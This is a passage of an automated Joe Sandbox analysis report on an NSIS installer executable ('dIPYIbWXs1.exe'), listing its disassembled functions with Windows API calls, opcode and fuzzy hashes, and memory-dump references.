                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2531174081-0
                                                        • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                        • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                        • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                        • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                        • GetMessagePos.USER32 ref: 00404AF1
                                                        • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                        • GlobalFree.KERNEL32(?), ref: 0040288E
                                                        • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                        • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                        • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                        • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: b3b0296aae7d07ccf202c372f6eb5d4231643c62e0b72ddb4c400c6d0b0db9aa
                                                        • Instruction ID: 15669048a0eccddd24d33736273231ff30a379fc8c0fbd4ac1fb96e88d02d9ac
                                                        • Opcode Fuzzy Hash: b3b0296aae7d07ccf202c372f6eb5d4231643c62e0b72ddb4c400c6d0b0db9aa
                                                        • Instruction Fuzzy Hash: F451F532D54199AEDB409FF9C888EAEBBB9EB4A345F04045BD414A3704C771AA4EC7B1
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                        • GetClientRect.USER32(?,?), ref: 00401DCC
                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                        • DeleteObject.GDI32(00000000), ref: 00401E20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                        • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                        • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                        • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                        APIs
                                                        • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                        • wsprintfA.USER32 ref: 00404A6A
                                                        • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                        • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                        • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                        • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3081826266
                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040301B,?), ref: 00402E50
                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                        • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                        • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                        • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                        APIs
                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,telefaxe Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3248276644-3081826266
                                                        • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                        • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                        • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                        • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 004051C1
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                          • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                        • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                        • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                        • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                        • GlobalFree.KERNEL32(007097A8), ref: 00403896
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3081826266
                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                        • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                        • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dIPYIbWXs1.exe,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00405ADC
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dIPYIbWXs1.exe,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00405AEA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-224404859
                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E4B115B
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B11B4
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B11C7
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B11F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 3afa5291d62c3715afa0bb18470b6a7c8c1afe6ab81ee40974a153984772c39f
                                                        • Instruction ID: e74d32fcd98527c8df33eef33bdb480d4061d4901f9b3ecab75129ecd4a253a7
                                                        • Opcode Fuzzy Hash: 3afa5291d62c3715afa0bb18470b6a7c8c1afe6ab81ee40974a153984772c39f
                                                        • Instruction Fuzzy Hash: E2318DB1804645AFEB00AFF9E848F667FE8EF0A384B14451BE855D6354E734AC0A8B70
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                        • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8